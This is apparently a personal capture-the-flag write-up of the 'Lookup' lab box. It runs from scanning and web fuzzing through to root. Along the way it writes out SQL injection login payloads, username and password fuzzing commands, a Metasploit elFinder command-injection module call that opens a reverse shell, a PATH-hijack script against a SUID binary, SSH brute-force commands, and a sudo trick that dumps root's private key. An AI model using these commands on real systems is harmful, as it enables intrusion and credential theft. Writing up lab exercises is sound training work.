Lookup Box

2025-09-01 14:52  •  web / ffuf / burp / metasploit / privesc

Lookup Box overview (placeholder)

first test for connectivity

Ping target IP
i ping the given IP — connection all good

Nmap scan for Open ports

Nmap running
while nmap is running i try to open the IP to the browser
Browser error before hosts entry
there is a domain name = lookup.thm

so i go to config the hosts of the ip for it to be able to open
(to be able to talk with the DNS)

nano or vim /etc/hosts/

Editing /etc/hosts
after add the ip to its domain name for the DNS, when i refresh its show a login page !!!
Editing /etc/hosts

Nmap result

Nmap results show ports
2 ports are open after scan — http (80) and ssh (22)

im stuckkk here @.@

but i ran a gobuster in the background maybe i found something more

Gobuster
gobuster running

> Interestingly !!! when i ffuf it i found something !!

ffuf initial findings
but status code is not 200 so cant really open it but we can know there is something

and then i try use feroxbuster to scan again

feroxbuster finds login.php
interestingly i found a login.php

then i try to burpsuit it

Burp intercepts login.php request
burp repeater set up
Req
Resp

first of all i try some of the basic SQL like

admin'1 OR '1'='1 -- &password
admin'1 OR '1'='1 # &password
admin' OR '1'='1 --password
admin' OR  1=1 -- password
username=' OR 'a'='a&password=test
username=' OR '1'='1'/*&password=anything
username=1' OR 1=1 -- &password=anything
No SQLi
> nothing interesting

so i try generic or just general admin or root

> something interesting here

Req
Resp
I first tried a username with the same length (5 characters), such as admia, and used any password of equal length, like testt. When I switched the username to admin, the response changed — it only reported a wrong password. This suggests that admin is a valid username, while admia triggers an error indicating both fields are invalid. I also noticed the Content-Length in the responses is different. 
ffuf -w /usr/share/wordlists/SecLists/Usernames/top-usernames-shortlist.txt \
  -X POST -u http://lookup.thm/login.php \
  -d "username=FUZZ&password=abbb" \
  -H "Content-Type: application/x-www-form-urlencoded"

Now i start fuzzing for possible passwords for the user admin.

ffuf password fuzzing admin
> the pass i found password123

Then I tried BurpSuite again.

But somehow the password didn’t work for admin? So I changed the password a bit to test.

Req
Resp
Using the password with the admin user gives the generic error as before.
But if I change or delete just one letter in the password, the response switches back to “wrong password.”

So here I think the username admin is valid,

but the password for that username might not be correct.

Because when I tested the password found by ffuf.
- First i try used password123 with user admin. it said “both wrong.”

But if I try password12 (missing one char)
- the output changes to just “wrong password.”

ffuf usernames using found password
Then I tried ffuf again with the password I found and fuzzed the usernames. Got a 302 redirect for jose with password123 → valid credential pair.

and then i try to use what we got the username jose and the pass password123 to try to login into the page

Login Sucess
Resp
interestingly it redirect to another page name files.lookup.thm so we add this to /etc/hosts
Req
Resp
after refresh the website its show like a file manager system??
a bit of google i found out its elFinder (open-source web application file manager)

tbh i kinda idk what to do here next i look into the repo and stuff and then i try google elfinder exploit. saw some interesting link and existing CVE for elfinder. maybe this version is old too?? so i try to go find the version on the site

elFinder about/version
in the about here we can see its version 2.1.47
elFinder about/version
we found the exact exploit for the vuln yayyyy (elfinder 2.1.47 command injection)

metasploit foothold

Req
Resp
msfconsole
    search elfinder
    use exploit/multi/http/elfinder_php_connector_exiftran_cmd_injection
    set RHOSTS files.lookup.thm
    set LHOST <your_kali_ip>
    exploit
Meterpreter www-data
After running getuid, we have a shell as www-data!!!

Privilege Escalation Enumeration

After getting a shell as www-data, i checked /etc/passwd and found root, think, ssm-user, ubuntu

Req

Next, i explored the user directories. In /home/think i found an interesting file called .passwords but i don’t have permission to read it.

/home/think/.passwords exists
okay, if i can’t read it directly, maybe privesc via SUID can help
find / -perm -4000 2>/dev/null
find SUID results
one entry stands out: /usr/sbin/pwm (not a default SUID)
Req
Resp
running it shows it calls id and then tries /home/<username>/.passwords

PATH hijack to dump think’s passwords

the binary doesn’t use an absolute path for id, so we hijack with our own script that says we are think:

export PATH=/tmp:$PATH
echo -e '#!/bin/bash\necho "uid=1000(think) gid=1000(think) groups=1000(think)"' > /tmp/id
chmod +x /tmp/id
/usr/sbin/pwm     # now it reads /home/think/.passwords
Dumped passwords content
password list dumped — save it and try brute force user back on my Vm

get user think

# pick your tool:
hydra -l think -P think_pass.txt ssh://lookup.thm
# or:
medusa -h lookup.thm -u think -P think_pass.txt -M ssh
Req
Resp
Success! ssh as think — user flag
Note : User flag can be found here :D

think → root with sudo look

sudo -l
# shows allowed: (ALL) /usr/bin/look
sudo /usr/bin/look '' /root/.ssh/id_rsa
Root SSH key dumped
dump root’s private key, copy to kali, set perms, ssh as root
chmod 600 root_key
ssh -i root_key root@lookup.thm
Root shell and flag
we in ! got the root flag and done :D

References

Burp intercepts login.php request — full size Repeater response — full size